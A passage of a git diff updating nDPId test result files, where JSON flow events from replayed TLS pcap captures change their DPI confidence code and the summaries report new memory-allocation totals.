00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mEAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mHAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAAAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -29,9 +29,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5884098 bytes -~~ total memory freed........: 5884098 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6017732 bytes +~~ total memory freed........: 6017732 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 968 chars diff --git a/test/results/tls_esni_sni_both.pcap.out b/test/results/tls_esni_sni_both.pcap.out index f0178a8b2..3ea88d156 100644 --- a/test/results/tls_esni_sni_both.pcap.out +++ b/test/results/tls_esni_sni_both.pcap.out 
@@ -4,16 +4,16 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595697574192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697574192,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjMAbsVnUj1AAAAALAC\/\/+ITAAAAgQFtAEDAwYBAQgKRX5W8wAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595697574222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697574222,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72MxjNlEZFZ1I9oAS\/\/+oqwAAAgQFeAEBBAIBAwMK"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595697574222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697574222,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjMAbsVnUj2YzZRGlAQEADZRAAA"} 
-01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} -01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": 
{"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} 
+01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697597731,"flow_last_seen":1595697597731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697597731,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1595697597731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697597731,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjaAbvycO9jAAAAALAC\/\/+plAAAAgQFtAEDAwYBAQgKRX6yWgAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697597760,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72Npkmiax8nDvZIAS\/\/9OXwAAAgQFeAEBBAIBAwMK"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697597760,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjaAbvycO9kZJomslAQEAB++AAA"} 
-01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} -01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": 
{"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} 
+01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI 
Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":13775,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1595697597855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 
@@ -23,9 +23,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876941 bytes -~~ total memory freed........: 5876941 bytes -~~ total allocations/frees...: 118166/118166 +~~ total memory allocated....: 6010575 bytes +~~ total memory freed........: 6010575 bytes +~~ total allocations/frees...: 120928/120928 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 1215 chars diff --git a/test/results/tls_false_positives.pcapng.out b/test/results/tls_false_positives.pcapng.out new file mode 100644 index 000000000..645ec247d --- /dev/null +++ b/test/results/tls_false_positives.pcapng.out 
